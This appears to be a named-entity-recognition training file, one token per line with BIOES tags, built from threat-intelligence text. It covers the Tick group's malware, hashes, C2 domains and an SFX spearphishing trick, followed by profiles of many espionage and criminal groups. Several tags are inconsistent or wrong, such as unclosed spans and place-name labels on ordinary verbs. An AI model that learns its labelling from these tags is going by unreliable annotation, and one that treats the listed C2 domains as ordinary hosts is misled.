+. O
+
+According O
+to O
+the O
+debug O
+path O
+in O
+the O
+body O
+, O
+the O
+author O
+of O
+the O
+tool O
+called O
+it O
+“ O
+NamelessHdoor S-MAL
+, O
+” O
+and O
+its O
+internal O
+version O
+is O
+identified O
+as O
+“ O
+V1.5. O
+” O
+
+The O
+payload O
+is O
+based O
+on O
+“ O
+Nameless B-MAL
+Backdoor E-MAL
+” O
+which O
+has O
+been O
+publicly O
+available O
+for O
+more B-TIME
+than I-TIME
+ten I-TIME
+years E-TIME
+. O
+
+The O
+oldest O
+code O
+we O
+could O
+identify O
+was O
+hosted O
+on O
+a O
+famous O
+Chinese O
+source O
+code O
+sharing O
+site O
+since O
+2005 S-TIME
+. O
+
+The O
+author O
+of O
+the B-MAL
+NamelessHdoor E-MAL
+appears O
+to O
+have O
+created O
+additional O
+versions O
+of O
+the O
+Nameless B-MAL
+Backdoor E-MAL
+by O
+removing O
+unnecessary O
+functions O
+, O
+and O
+added O
+open-source O
+DLL S-TOOL
+injection O
+code O
+from O
+ReflectiveDLLLoader S-TOOL
+. O
+
+There O
+is O
+minimal O
+public O
+information O
+regarding O
+the O
+Nameless B-MAL
+Backdoor E-MAL
+, O
+except O
+for O
+the O
+interesting O
+report O
+from O
+Cyphort S-SECTEAM
+in O
+2015 S-TIME
+. O
+
+The O
+researcher O
+of O
+the O
+company O
+analyzed O
+multiple O
+threats O
+, O
+including O
+Invader S-MAL
+, O
+Nioupale S-MAL
+(Daserf O
+) O
+and O
+Hdoor S-MAL
+found O
+in O
+an O
+attack O
+against O
+an O
+Asian O
+financial O
+institution O
+. O
+
+We O
+examined O
+the O
+sample O
+described O
+in O
+the O
+report O
+as O
+Hdoor S-MAL
+and O
+found O
+it O
+’s O
+a O
+previous O
+version O
+of O
+the O
+NamelessHdoor S-MAL
+we O
+discovered O
+in O
+the O
+Minzen O
+sample O
+, O
+but O
+without O
+support O
+for O
+DLL S-TOOL
+injection O
+. O
+
+It O
+turned O
+out O
+that O
+the O
+DLL S-TOOL
+files O
+we O
+found O
+are O
+a O
+custom O
+variant O
+of O
+Gh0st B-MAL
+RAT E-MAL
+, O
+and O
+the O
+EXE O
+files O
+download O
+the O
+RAT O
+. O
+
+Since O
+the O
+source O
+code O
+is O
+publicly O
+available O
+, O
+Gh0st B-MAL
+RAT E-MAL
+has O
+been O
+used O
+by O
+multiple O
+actors O
+for O
+years O
+. O
+
+The O
+domain O
+, O
+softfix.co.kr S-DOM
+was O
+registered O
+in O
+2014 S-TIME
+. O
+
+One O
+of O
+subdomains O
+, O
+news.softfix.co.kr S-DOM
+was O
+the O
+C2 S-TOOL
+server O
+of O
+Daserf S-MAL
+( O
+9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 S-SHA2
+) O
+. O
+
+Another O
+subdomain O
+, O
+bbs.softfix.co.kr S-DOM
+was O
+hosted O
+on O
+same O
+IP O
+address O
+as O
+bbs.gokickes.com S-DOM
+, O
+which O
+was O
+reported O
+as O
+the O
+C2 S-TOOL
+server O
+of O
+Invader S-MAL
+by O
+Cyphort S-SECTEAM
+. O
+
+We O
+also O
+identified O
+www.gokickes.com S-DOM
+was O
+the O
+C2 S-TOOL
+of O
+another O
+Invader B-MAL
+variant E-MAL
+( O
+57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb S-SHA2
+) O
+. O
+
+In O
+addition O
+to O
+the O
+infrastructure O
+, O
+the O
+attacker O
+also O
+shared O
+code O
+. O
+
+The O
+Gh0st S-MAL
+downloaders O
+employ O
+simple O
+substitution O
+ciphers O
+for O
+hiding O
+strings O
+. O
+
+We O
+also O
+identified O
+another O
+malware O
+family O
+, O
+HomamDownloader S-MAL
+, O
+sharing O
+some O
+servers O
+with O
+Daserf S-MAL
+. O
+
+An O
+overview O
+of O
+the O
+connections O
+among O
+these O
+threats O
+is O
+discussed O
+in O
+below O
+. O
+
+HomamDownloader S-MAL
+is O
+a O
+small O
+downloader O
+program O
+with O
+minimal O
+interesting O
+characteristics O
+from O
+a O
+technical O
+point O
+of O
+view O
+. O
+
+HomamDownloader S-MAL
+was O
+discovered O
+to O
+be O
+delivered O
+by O
+Tick S-APT
+via O
+a O
+spearphishing S-ACT
+email S-TOOL
+. O
+
+The O
+adversary O
+crafted O
+credible O
+email S-TOOL
+and O
+attachment O
+after O
+understanding O
+the O
+targets O
+and O
+their O
+behavior O
+. O
+
+The O
+email S-TOOL
+below O
+was O
+sent O
+from O
+a O
+personal O
+email S-TOOL
+account O
+with O
+a O
+subject O
+line O
+of O
+“ O
+New O
+Year O
+Wishes O
+on O
+January B-TIME
+1st E-TIME
+” O
+. O
+
+The O
+message O
+asked O
+the O
+recipient O
+to O
+rename O
+the O
+attachment O
+extension O
+from O
+“ O
+._X_ S-FILE
+” O
+to O
+“ O
+.exe S-FILE
+” O
+and O
+opening O
+it O
+with O
+the O
+password O
+specified O
+in O
+the O
+email S-TOOL
+to O
+view O
+the O
+Happy O
+New O
+Year O
+eCard O
+in O
+the O
+correct O
+and O
+polite O
+language O
+. O
+
+In O
+addition O
+to O
+the O
+social O
+engineering O
+email S-TOOL
+technique O
+, O
+the O
+attacker O
+also O
+employs O
+a O
+trick O
+to O
+the O
+attachment O
+. O
+
+The O
+actor O
+embedded O
+malicious O
+code O
+to O
+a O
+resource O
+section O
+of O
+the O
+legitimate O
+SFX O
+file O
+created O
+by O
+a O
+file O
+encryption O
+tool O
+, O
+and O
+modified O
+the O
+entry O
+point O
+of O
+the O
+program O
+for O
+jumping O
+to O
+the O
+malicious O
+code O
+soon O
+after O
+the O
+SFX O
+program O
+starts O
+. O
+
+The O
+malicious O
+code O
+drops O
+HomamDownloader S-MAL
+, O
+then O
+jumps O
+back O
+to O
+the O
+regular O
+flow O
+in O
+the O
+CODE O
+section O
+, O
+which O
+in O
+turn O
+asks O
+the O
+user O
+the O
+password O
+and O
+decrypts O
+the O
+file O
+. O
+
+Therefore O
+, O
+once O
+a O
+user O
+executes O
+the O
+attachment O
+and O
+sees O
+the O
+password O
+dialog O
+on O
+SFX O
+, O
+the O
+downloader O
+dropped O
+by O
+the O
+malicious O
+code O
+starts O
+working O
+even O
+if O
+the O
+user O
+chooses O
+the O
+Cancel O
+on O
+the O
+password O
+window O
+. O
+
+Should O
+the O
+user O
+become O
+aware O
+of O
+the O
+infection O
+later O
+, O
+it O
+may O
+be O
+difficult O
+to O
+find O
+the O
+cause O
+due O
+to O
+the O
+fact O
+that O
+the O
+original O
+embedded O
+file O
+contained O
+within O
+the O
+SFX O
+is O
+benign O
+. O
+
+Tick S-APT
+was O
+spotted O
+last O
+year O
+, O
+but O
+they O
+are O
+actively O
+and O
+silently O
+attacking O
+various O
+organizations O
+in O
+South B-LOC
+Korea E-LOC
+and O
+Japan S-LOC
+for O
+a O
+number O
+of O
+years O
+. O
+
+While O
+some O
+of O
+the O
+group O
+’s O
+tools O
+, O
+tactics O
+, O
+and O
+procedures O
+( O
+TTPs O
+) O
+have O
+been O
+covered O
+within O
+this O
+article O
+, O
+it O
+is O
+likely O
+there O
+is O
+much O
+that O
+still O
+remains O
+uncovered O
+. O
+
+Daserf S-MAL
+: O
+04080fbab754dbf0c7529f8bbe661afef9c2cba74e3797428538ed5c243d705a S-SHA2
+. O
+
+Daserf S-MAL
+: O
+f8458a0711653071bf59a3153293771a6fb5d1de9af7ea814de58f473cba9d06 S-SHA2
+. O
+
+Daserf S-MAL
+: O
+e8edde4519763bb6669ba99e33b4803a7655805b8c3475b49af0a49913577e51 S-SHA2
+. O
+
+Daserf S-MAL
+: O
+21111136d523970e27833dd2db15d7c50803d8f6f4f377d4d9602ba9fbd355cd S-SHA2
+. O
+
+Daserf S-MAL
+: O
+9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 S-SHA2
+. O
+
+Invader S-MAL
+: O
+0df20ccd074b722d5fe1358b329c7bdebcd7e3902a1ca4ca8d5a98cc5ce4c287 S-SHA2
+. O
+
+Invader S-MAL
+: O
+e9574627349aeb7dd7f5b9f9c5ede7faa06511d7fdf98804526ca1b2e7ce127e S-SHA2
+. O
+
+Invader S-MAL
+: O
+57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb S-SHA2
+. O
+9002 S-MAL:933d66b43b3ce9a572ee3127b255b4baf69d6fdd7cb24da609b52ee277baa76e S-SHA2
+. O
+9002 S-MAL:2bec20540d200758a223a7e8f7b2f98cd4949e106c1907d3f194216208c5b2fe S-SHA2
+. O
+9002 S-MAL:055fe8002de293401852310ae76cb730c570f2037c3c832a52a79b70e2cb7831 S-SHA2
+. O
+
+Minzen S-MAL
+: O
+797d9c00022eaa2f86ddc9374f60d7ad92128ca07204b3e2fe791c08da9ce2b1 S-SHA2
+. O
+
+Minzen S-MAL
+: O
+9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 S-SHA2
+. O
+
+Minzen S-MAL
+: O
+26727d139b593486237b975e7bdf93a8148c52d5fb48d5fe540a634a16a6ba82 S-SHA2
+. O
+
+NamelessHdoor S-MAL
+: O
+dfc8a6da93481e9dab767c8b42e2ffbcd08fb813123c91b723a6e6d70196636f S-SHA2
+. O
+
+Gh0stRAt B-MAL
+Downloader E-MAL
+: O
+ce47e7827da145823a6f2b755975d1d2f5eda045b4c542c9b9d05544f3a9b974 S-SHA2
+. O
+
+Gh0stRAt B-MAL
+Downloader E-MAL
+: O
+e34f4a9c598ad3bb243cb39969fb9509427ff9c08e63e8811ad26b72af046f0c S-SHA2
+. O
+
+Custom B-MAL
+Gh0st E-MAL
+: O
+8e5a0a5f733f62712b840e7f5051a2bd68508ea207e582a190c8947a06e26f40 S-SHA2
+. O
+
+Datper S-MAL
+: O
+7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849 S-SHA2
+. O
+
+HomamDownloader S-MAL
+: O
+a624d2cd6dee3b6150df3ca61ee0f992e2d6b08b3107f5b00f8bf8bcfe07ebe7 S-SHA2
+. O
+
+C2 S-TOOL
+: O
+lywjrea.gmarketshop.net S-DOM
+. O
+
+C2 S-TOOL
+: O
+krjregh.sacreeflame.com S-DOM
+. O
+
+C2 S-TOOL
+: O
+psfir.sacreeflame.com S-DOM
+. O
+
+C2 S-TOOL
+: O
+lywja.healthsvsolu.com S-DOM
+. O
+
+C2 S-TOOL
+: O
+phot.healthsvsolu.com S-DOM
+. O
+
+C2 S-TOOL
+: O
+blog.softfix.co.kr S-DOM
+. O
+
+C2 S-TOOL
+: O
+news.softfix.co.kr S-DOM
+. O
+
+C2 S-TOOL
+: O
+www.gokickes.com S-DOM
+. O
+
+C2 S-TOOL
+: O
+log.gokickes.com S-DOM
+. O
+
+The O
+group O
+is O
+responsible O
+for O
+the O
+campaign O
+known O
+as O
+Operation B-ACT
+Wilted I-ACT
+Tulip E-ACT
+. O
+
+Dark B-APT
+Caracal E-APT 
+is O
+threat O
+group O
+that O
+has O
+been O
+attributed O
+to O
+the O
+Lebanese S-LOC
+General B-IDTY
+Directorate I-IDTY
+of I-IDTY
+General I-IDTY
+Security E-IDTY
+( O
+GDGS S-IDTY
+) O
+and O
+has O
+operated O
+since O
+at O
+least O
+2012 S-TIME
+. O
+
+Darkhotel  S-APT 
+is O
+a O
+threat O
+group O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2004 S-TIME
+. O
+
+The O
+group O
+has O
+conducted O
+activity O
+on O
+hotel O
+and O
+business O
+center O
+Wi‑Fi O
+and O
+physical O
+connections O
+as O
+well O
+as O
+peer-to-peer O
+and O
+file O
+sharing O
+networks O
+. O
+
+The O
+actors O
+have O
+also O
+conducted O
+spearphishing S-ACT
+. O
+
+Unknown O
+. O
+
+Charming B-APT
+Kitten E-APT 
+is O
+an O
+Iranian O
+cyber O
+espionage O
+group O
+that O
+has O
+been O
+active O
+since O
+approximately O
+2014 S-TIME
+. O
+
+They O
+appear O
+to O
+focus O
+on O
+targeting O
+individuals O
+of O
+interest O
+to O
+Iran S-LOC
+who O
+work O
+in O
+academic O
+research O
+, O
+human O
+rights O
+, O
+and O
+media O
+, O
+with O
+most O
+victims O
+having O
+been O
+located O
+in O
+Iran S-LOC
+, O
+the O
+US B-LOC
+, O
+Israel S-LOC
+, O
+and O
+the O
+UK B-LOC
+. O
+
+Charming B-APT
+Kitten E-APT
+usually O
+tries O
+to O
+access O
+private O
+email S-TOOL
+and O
+Facebook S-IDTY
+accounts O
+, O
+and O
+sometimes O
+establishes O
+a O
+foothold O
+on O
+victim O
+computers O
+as O
+a O
+secondary O
+objective O
+. O
+
+The O
+group O
+'s O
+TTPs O
+overlap O
+extensively O
+with O
+another O
+group O
+, O
+Magic B-APT
+Hound E-APT
+, O
+resulting O
+in O
+reporting O
+that O
+may O
+not O
+distinguish O
+between O
+the O
+two O
+groups' O
+activities O
+. O
+
+Cleaver S-APT
+: O
+Threat B-APT
+Group I-APT
+2889 E-APT
+, O
+TG-2889 S-APT
+. O
+
+Cleaver S-APT 
+is O
+a O
+threat O
+group O
+that O
+has O
+been O
+attributed O
+to O
+Iranian O
+actors O
+and O
+is O
+responsible O
+for O
+activity O
+tracked O
+as O
+Operation B-ACT
+Cleaver E-ACT
+. O
+
+Strong O
+circumstantial O
+evidence O
+suggests O
+Cleaver S-APT
+is O
+linked O
+to O
+Threat B-APT
+Group I-APT
+2889 E-APT
+( O
+TG-2889 B-APT
+) O
+. O
+
+Cobalt B-APT
+Group E-APT
+: O
+Cobalt B-APT
+Gang E-APT
+, O
+Cobalt B-APT
+Spider E-APT
+. O
+
+Cobalt B-APT
+Group E-APT 
+is O
+a O
+financially O
+motivated O
+threat O
+group O
+that O
+has O
+primarily O
+targeted O
+financial O
+institutions O
+. O
+
+The O
+group O
+has O
+conducted O
+intrusions O
+to O
+steal O
+money O
+via O
+targeting O
+ATM B-TOOL
+systems E-TOOL
+, O
+card O
+processing O
+, O
+payment B-TOOL
+systems E-TOOL
+and O
+SWIFT B-TOOL
+systems E-TOOL
+. O
+
+Cobalt B-APT
+Group E-APT
+has O
+mainly O
+targeted O
+banks O
+in O
+Eastern B-LOC
+Europe E-LOC
+, O
+Central B-LOC
+Asia E-LOC
+, O
+and O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+One O
+of O
+the O
+alleged O
+leaders O
+was O
+arrested O
+in O
+Spain S-LOC
+in O
+early O
+2018 S-TIME
+, O
+but O
+the O
+group O
+still O
+appears O
+to O
+be O
+active O
+. O
+
+The O
+group O
+has O
+been O
+known O
+to O
+target O
+organizations O
+in O
+order O
+to O
+use O
+their O
+access O
+to O
+then O
+compromise O
+additional O
+victims O
+. O
+
+Reporting O
+indicates O
+there O
+may O
+be O
+links O
+between O
+Cobalt B-APT
+Group E-APT
+and O
+both O
+the O
+malware O
+Carbanak S-MAL
+and O
+the O
+group O
+Carbanak S-APT
+. O
+
+Taidoor S-APT
+is O
+a O
+threat O
+group O
+that O
+has O
+operated O
+since O
+at O
+least O
+2009 S-TIME
+and O
+has O
+primarily O
+targeted O
+the O
+Taiwanese B-IDTY
+government E-IDTY
+. O
+
+TEMP.Veles S-APT
+： O
+XENOTIME S-APT
+. O
+
+TEMP.Veles S-APT
+is O
+a O
+Russia S-LOC
+based O
+threat O
+group O
+that O
+has O
+targeted O
+critical O
+infrastructure O
+. O
+
+The O
+group O
+has O
+been O
+observed O
+utilizing O
+TRITON S-MAL
+, O
+a O
+malware O
+framework O
+designed O
+to O
+manipulate O
+industrial O
+safety O
+systems O
+. O
+
+The B-APT
+White I-APT
+Company E-APT
+is O
+a O
+likely O
+state-sponsored O
+threat O
+actor O
+with O
+advanced O
+capabilities O
+. O
+
+From O
+2017 B-TIME
+through I-TIME
+2018 E-TIME
+, O
+the O
+group O
+led O
+an O
+espionage O
+campaign O
+called O
+Operation B-ACT
+Shaheen E-ACT
+targeting O
+government S-IDTY
+and O
+military B-IDTY
+organizations E-IDTY
+in O
+Pakistan S-LOC
+. O
+
+Molerats S-APT
+: O
+Operation B-APT
+Molerats E-APT
+, O
+Gaza B-APT
+Cybergang E-APT
+. O
+
+Molerats S-APT
+is O
+a O
+politically-motivated O
+threat O
+group O
+that O
+has O
+been O
+operating O
+since O
+2012 S-TIME
+. O
+
+The O
+group O
+'s O
+victims O
+have O
+primarily O
+been O
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+Europe S-LOC
+, O
+and O
+the B-LOC
+United I-LOC
+States E-LOC
+. O
+
+MuddyWater S-APT
+: O
+Seedworm S-APT
+, O
+TEMP.Zagros S-APT
+. O
+
+MuddyWater S-APT
+is O
+an O
+Iranian S-LOC
+threat O
+group O
+that O
+has O
+primarily O
+targeted O
+Middle B-LOC
+Eastern I-LOC
+nations E-LOC
+, O
+and O
+has O
+also O
+targeted O
+European S-LOC
+and O
+North B-LOC
+American I-LOC
+nations E-LOC
+. O
+
+The O
+group O
+'s O
+victims O
+are O
+mainly O
+in O
+the O
+telecommunications S-IDTY
+, O
+government S-IDTY
+( O
+IT B-IDTY
+services E-IDTY
+) O
+, O
+and O
+oil B-IDTY
+sectors E-IDTY
+. O
+
+Activity O
+from O
+this O
+group O
+was O
+previously O
+linked O
+to O
+FIN7 S-APT
+, O
+but O
+the O
+group O
+is O
+believed O
+to O
+be O
+a O
+distinct O
+group O
+possibly O
+motivated O
+by O
+espionage O
+. O
+
+Naikon S-APT
+is O
+a O
+threat O
+group O
+that O
+has O
+focused O
+on O
+targets O
+around O
+the O
+South B-LOC
+China I-LOC
+Sea E-LOC
+. O
+
+The O
+group O
+has O
+been O
+attributed O
+to O
+the O
+Chinese B-IDTY
+People I-IDTY
+’s I-IDTY
+Liberation I-IDTY
+Army I-IDTY
+’s E-IDTY
+( O
+PLA S-IDTY
+) O
+Chengdu B-IDTY
+Military I-IDTY
+Region I-IDTY
+Second I-IDTY
+Technical I-IDTY
+Reconnaissance I-IDTY
+Bureau E-IDTY
+( O
+Military B-IDTY
+Unit I-IDTY
+Cover I-IDTY
+Designator I-IDTY
+78020 E-IDTY
+) O
+. O
+
+While O
+Naikon S-APT
+shares O
+some O
+characteristics O
+with O
+APT30 S-APT
+, O
+the O
+two O
+groups O
+do O
+not O
+appear O
+to O
+be O
+exact O
+matches O
+. O
+
+APT39 S-APT
+: O
+Chafer S-APT
+. O
+
+APT39 S-APT
+is Oan O
+Iranian O
+cyber O
+espionage O
+group O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2014 S-TIME
+. O
+
+They O
+have O
+targeted O
+the O
+telecommunication O
+and O
+travel O
+industries O
+to O
+collect O
+personal O
+information O
+that O
+aligns O
+with O
+Iran S-LOC
+'s O
+national O
+priorities O
+. O
+
+APT41 S-APT
+is O
+a O
+group O
+that O
+carries O
+out O
+Chinese O
+state-sponsored O
+espionage O
+activity O
+in O
+addition O
+to O
+financially O
+motivated O
+activity O
+. O
+
+APT41 S-APT
+has O
+been O
+active O
+since O
+as O
+early O
+as O
+2012 S-TIME
+. O
+
+The O
+group O
+has O
+been O
+observed O
+targeting O
+healthcare O
+, O
+telecom O
+, O
+technology O
+, O
+and O
+video O
+game O
+industries O
+in O
+14 O
+countries O
+. O
+
+Axiom S-APT
+: O
+Group72 S-APT
+. O
+
+Axiom S-APT
+is O
+a O
+cyber O
+espionage O
+group O
+suspected O
+to O
+be O
+associated O
+with O
+the O
+Chinese O
+government O
+. O
+
+It O
+is O
+responsible O
+for O
+the O
+Operation B-ACT
+SMN I-ACT
+campaign E-ACT
+. O
+
+Though O
+both O
+this O
+group O
+and O
+Winnti S-APT
+Group use O
+the O
+malware O
+Winnti S-MAL
+, O
+the O
+two O
+groups O
+appear O
+to O
+be O
+distinct O
+based O
+on O
+differences O
+in O
+reporting O
+on O
+the O
+groups' O
+TTPs O
+and O
+targeting O
+. O
+
+Suckfly S-APT
+is O
+a O
+China S-LOC
+based O
+threat O
+group O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2014 S-TIME
+. O
+
+TA459 S-APT
+is O
+a O
+threat O
+group O
+believed O
+to O
+operate B-LOC
+out I-LOC
+of I-LOC
+China E-LOC
+that O
+has O
+targeted O
+countries O
+including O
+Russia S-LOC
+, O
+Belarus S-LOC
+, O
+Mongolia S-LOC
+, O
+and O
+others O
+. O
+
+TA505 S-APT
+is O
+a O
+financially O
+motivated O
+threat O
+group O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2014 S-TIME
+. O
+
+The O
+group O
+is O
+known O
+for O
+frequently O
+changing O
+malware O
+and O
+driving O
+global O
+trends O
+in O
+criminal O
+malware O
+distribution O
+. O
+
+Magic B-APT
+Hound E-APT
+: O
+Rocket B-APT
+Kitten E-APT
+, O
+Operation B-APT
+Saffron I-APT
+Rose E-APT
+, O
+Ajax B-APT
+Security I-APT
+Team E-APT
+, O
+Operation B-APT
+Woolen-Goldfish E-APT
+, O
+Newscaster S-APT
+, O
+Cobalt B-APT
+Gypsy E-APT
+, O
+APT35 S-APT
+. O
+
+Magic B-APT
+Hound E-APT
+is O
+an O
+Iranian-sponsored O
+threat O
+group O
+operating O
+primarily O
+in O
+the O
+Middle B-LOC
+East E-LOC
+that O
+dates O
+back O
+as O
+early O
+as O
+2014 S-TIME
+. O
+
+The O
+group O
+behind O
+the O
+campaign O
+has O
+primarily O
+targeted O
+organizations O
+in O
+the O
+energy O
+, O
+government O
+, O
+and O
+technology O
+sectors O
+that O
+are O
+either O
+based O
+or O
+have O
+business O
+interests O
+in O
+Saudi B-LOC
+Arabia E-LOC
+. O
+menuPass S-APT
+: O
+Stone B-APT
+Panda E-APT
+, O
+APT10 S-APT
+, O
+Red B-APT
+Apollo E-APT
+, O
+CVNX S-APT
+, O
+HOGFISH S-APT
+. O
+menuPass S-APT
+is O
+a O
+threat O
+group O
+that O
+appears O
+to O
+originate O
+from O
+China S-LOC
+and O
+has O
+been O
+active O
+since O
+approximately O
+2009 S-TIME
+. O
+
+The O
+group O
+has O
+targeted O
+healthcare O
+, O
+defense O
+, O
+aerospace O
+, O
+and O
+government O
+sectors O
+, O
+and O
+has O
+targeted O
+Japanese O
+victims O
+since O
+at O
+least O
+2014 S-TIME
+. O
+
+In O
+2016 S-TIME
+and O
+2017 S-TIME
+, O
+the O
+group O
+targeted O
+managed O
+IT O
+service O
+providers O
+, O
+manufacturing O
+and O
+mining O
+companies O
+, O
+and O
+a O
+university O
+. O
+
+Moafee S-APT
+is O
+a O
+threat O
+group O
+that O
+appears O
+to O
+operate O
+from O
+the O
+Guandong B-LOC
+Province I-LOC
+of I-LOC
+China E-LOC
+. O
+
+Due O
+to O
+overlapping O
+TTPs O
+, O
+including O
+similar O
+custom O
+tools O
+, O
+Moafee S-APT
+is O
+thought O
+to O
+have O
+a O
+direct O
+or O
+indirect O
+relationship O
+with O
+the O
+threat O
+group DragonOK S-APT
+. O
+
+SilverTerrier S-APT
+is O
+a O
+Nigerian S-LOC
+threat O
+group O
+that O
+has O
+been O
+seen O
+active O
+since O
+2014 S-TIME
+. O
+
+SilverTerrier S-APT
+mainly O
+targets O
+organizations O
+in O
+high O
+technology O
+, O
+higher O
+education O
+, O
+and O
+manufacturing O
+. O
+
+Operation O
+Soft B-APT
+Cell E-APT
+is O
+a O
+group O
+that O
+is O
+reportedly O
+affiliated O
+with O
+China S-LOC
+and O
+is O
+likely O
+state-sponsored O
+. O
+
+The O
+group O
+has O
+operated O
+since O
+at O
+least O
+2012 S-TIME
+and O
+has O
+compromised O
+high-profile B-IDTY
+telecommunications I-IDTY
+networks E-IDTY
+. O
+
+Sowbug S-APT
+is O
+a O
+threat O
+group O
+that O
+has O
+conducted O
+targeted O
+attacks O
+against O
+organizations O
+in O
+South B-LOC
+America E-LOC
+and O
+Southeast B-LOC
+Asia E-LOC
+, O
+particularly O
+government B-IDTY
+entities E-IDTY
+, O
+since O
+at O
+least O
+2015 S-TIME
+. O
+
+Tropic B-APT
+Trooper E-APT
+is O
+an O
+unaffiliated O
+threat O
+group O
+that O
+has O
+led O
+targeted O
+campaigns O
+against O
+targets O
+in O
+Taiwan S-LOC
+, O
+the O
+Philippines B-LOC
+, O
+and O
+Hong B-LOC
+Kong E-LOC
+. O
+
+Tropic B-APT
+Trooper E-APT
+focuses O
+on O
+targeting O
+government S-IDTY
+, O
+healthcare O
+, O
+transportation O
+, O
+and O
+high-tech O
+industries O
+and O
+has O
+been O
+active O
+since O
+2011 S-TIME
+. O
+
+Turla S-APT
+: O
+Waterbug S-APT
+, O
+WhiteBear S-APT
+, O
+VENOMOUS B-APT
+BEAR E-APT
+, O
+Snake S-APT
+, O
+Krypton S-APT
+. O
+
+Turla S-APT
+is O
+a O
+Russian-based O
+threat O
+group O
+that O
+has O
+infected O
+victims O
+in O
+over O
+45 O
+countries O
+, O
+spanning O
+a O
+range O
+of O
+industries O
+including O
+government S-IDTY
+, O
+embassies S-IDTY
+, O
+military S-IDTY
+, O
+education O
+, O
+research O
+and O
+pharmaceutical B-IDTY
+companies E-IDTY
+since O
+2004 S-TIME
+. O
+
+Heightened O
+activity O
+was O
+seen O
+in O
+mid-2015 S-TIME
+. O
+
+Turla S-APT
+is O
+known O
+for O
+conducting O
+watering B-ACT
+hole E-ACT
+and O
+spearphishing B-ACT
+campaigns E-ACT
+and O
+leveraging B-TOOL
+in-house I-TOOL
+tools E-TOOL
+and O
+malware S-MAL
+. O
+
+Turla S-APT
+’s O
+espionage O
+platform O
+is O
+mainly O
+used O
+against O
+Windows S-OS
+machines O
+, O
+but O
+has O
+also O
+been O
+seen O
+used O
+against O
+macOS S-OS
+and O
+Linux S-OS
+machines O
+. O
+
+Winnti B-APT
+Group E-APT
+: O
+Blackfly S-APT
+. O
+
+Winnti B-APT
+Group E-APT
+is O
+a O
+threat O
+group O
+with O
+Chinese B-LOC
+origins E-LOC
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2010 S-TIME
+. O
+
+The O
+group O
+has O
+heavily O
+targeted O
+the O
+gaming O
+industry O
+, O
+but O
+it O
+has O
+also O
+expanded O
+the O
+scope O
+of O
+its O
+targeting O
+. O
+
+Some O
+reporting O
+suggests O
+a O
+number O
+of O
+other O
+groups O
+, O
+including O
+Axiom S-APT
+, O
+APT17 S-APT
+, O
+and O
+Ke3chang S-APT
+, O
+are O
+closely O
+linked O
+to O
+Winnti B-APT
+Group E-APT
+. O
+
+Stealth B-APT
+Falcon E-APT
+is O
+a O
+threat O
+group O
+that O
+has O
+conducted O
+targeted O
+spyware O
+attacks O
+against O
+Emirati O
+journalists O
+, O
+activists O
+, O
+and O
+dissidents O
+since O
+at O
+least O
+2012 S-TIME
+. O
+
+Circumstantial O
+evidence O
+suggests O
+there O
+could O
+be O
+a O
+link O
+between O
+this O
+group O
+and O
+the O
+United B-IDTY
+Arab I-IDTY
+Emirates I-IDTY
+( I-IDTY
+UAE I-IDTY
+) I-IDTY
+government E-IDTY
+, O
+but O
+that O
+has O
+not O
+been O
+confirmed O
+. O
+
+Stolen B-APT
+Pencil E-APT
+is O
+a O
+threat O
+group O
+likely O
+originating O
+from O
+DPRK S-LOC
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+May B-TIME
+2018 E-TIME
+. O
+
+The O
+group O
+appears O
+to O
+have O
+targeted O
+academic O
+institutions O
+, O
+but O
+its O
+motives O
+remain O
+unclear O
+. O
+
+Strider S-APT
+: O
+ProjectSauron B-APT
+. E-APT
+Strider S-APT
+is O
+a O
+threat O
+group O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2011 S-TIME
+and O
+has O
+targeted O
+victims O
+in O
+Russia S-LOC
+, O
+China S-LOC
+, O
+Sweden S-LOC
+, O
+Belgium S-LOC
+, O
+Iran S-LOC
+, O
+and O
+Rwanda S-LOC
+. O
+
+Putter B-APT
+Panda E-APT
+: O
+APT2 S-APT
+, O
+MSUpdater S-APT
+. O
+
+Putter B-APT
+Panda E-APT
+is O
+a O
+Chinese S-LOC
+threat O
+group O
+that O
+has O
+been O
+attributed O
+to O
+Unit B-IDTY
+61486 I-IDTY
+of I-IDTY
+the I-IDTY
+12th I-IDTY
+Bureau I-IDTY
+of I-IDTY
+the I-IDTY
+PLA I-IDTY
+’s I-IDTY
+3rd I-IDTY
+General I-IDTY
+Staff I-IDTY
+Department E-IDTY
+( O
+GSD S-IDTY
+) O
+. O
+
+Rancor S-APT
+is O
+a O
+threat O
+group O
+that O
+has O
+led O
+targeted O
+campaigns O
+against O
+the O
+South B-LOC
+East I-LOC
+Asia I-LOC
+region E-LOC
+. O
+
+Rancor S-APT
+uses O
+politically-motivated B-TOOL
+lures E-TOOL
+to O
+entice O
+victims O
+to O
+open O
+malicious O
+documents O
+. O
+
+RTM S-APT
+is O
+a O
+cybercriminal O
+group O
+that O
+has O
+been O
+active O
+since O
+at O
+least O
+2015 S-TIME
+and O
+is O
+primarily O
+interested O
+in O
+users O
+of O
+remote O
+banking O
+systems O
+in O
+Russia B-LOC
+and I-LOC
+neighboring I-LOC
+countries E-LOC
+. O
+
+The O
+group O
+uses O
+a O
+Trojan S-MAL
+by O
+the O
+same O
+name O
+( O
+RTM S-APT
+) O
+. O
+
+FIN4 S-APT
+is O
+a O
+financially O
+motivated O
+threat O
+group O
+that O
+has O
+targeted O
+confidential O
+information O
+related O
+to O
+the O
+public O
+financial O
+market O
+, O
+particularly O
+regarding O
+healthcare O
+and O
+pharmaceutical O
+companies O
+, O
+since O
+at O
+least O
+2013 S-TIME
+. O
+
+FIN4 S-APT
+is O
+unique O
+in O
+that O
+they O
+do O
+not O
+infect O
+victims O
+with O
+typical O
+persistent O
+malware O
+, O
+but O
+rather O
+they O
+focus O
+on O
+capturing O
+credentials O
+authorized O
+to O
+access O
+email S-TOOL
+and O
+other O
+non-public O
+correspondence O
+. O
+
